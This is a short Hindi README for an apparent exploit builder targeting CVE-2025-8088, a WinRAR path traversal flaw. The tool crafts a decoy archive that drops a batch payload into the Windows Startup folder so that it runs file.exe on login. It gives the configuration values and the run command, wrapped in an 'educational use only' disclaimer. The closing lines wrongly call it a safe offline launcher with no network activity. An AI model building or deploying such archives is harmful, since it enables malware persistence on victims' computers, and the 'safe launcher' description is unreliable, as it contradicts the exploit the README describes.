
# CVE-2025-8088-बिल्डर
⚠ यह उपकरण केवल शैक्षिक उपयोग के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।
एक Python स्क्रिप्ट जो CVE-2025-8088, WinRAR में एक पथ ट्रैवर्सल कमजोरी का शोषण करती है, एक दुर्भावनापूर्ण संग्रह उत्पन्न करके जो निष्पादन योग्य पेलोड को विंडोज स्टार्टअप फ़ोल्डर में रखती है, कई सापेक्ष निर्देशिका स्तरों का उपयोग करके निकासी स्थान की परवाह किए बिना विश्वसनीय निष्पादन सुनिश्चित करने के लिए
config.py फ़ाइल को कॉन्फ़िगर करें
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
अपनी खुद की डिकॉय फ़ाइल का उपयोग करने के लिए, नाम के बजाय इसका पूरा पथ टाइप करें।
स्क्रिप्ट चलाएं:
python CVE-2025-8088.py
आउटपुट output फ़ोल्डर में दिखाई देगा।
यह उपकरण केवल शैक्षिक उपयोग के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।
लेखक: Desert Scripts
विवरण:
एक स्थानीय, ऑफलाइन लॉन्चर जो MyAppInstaller.exe चलाता है।
कोई नेटवर्क गतिविधि नहीं। सुरक्षित और पारदर्शी।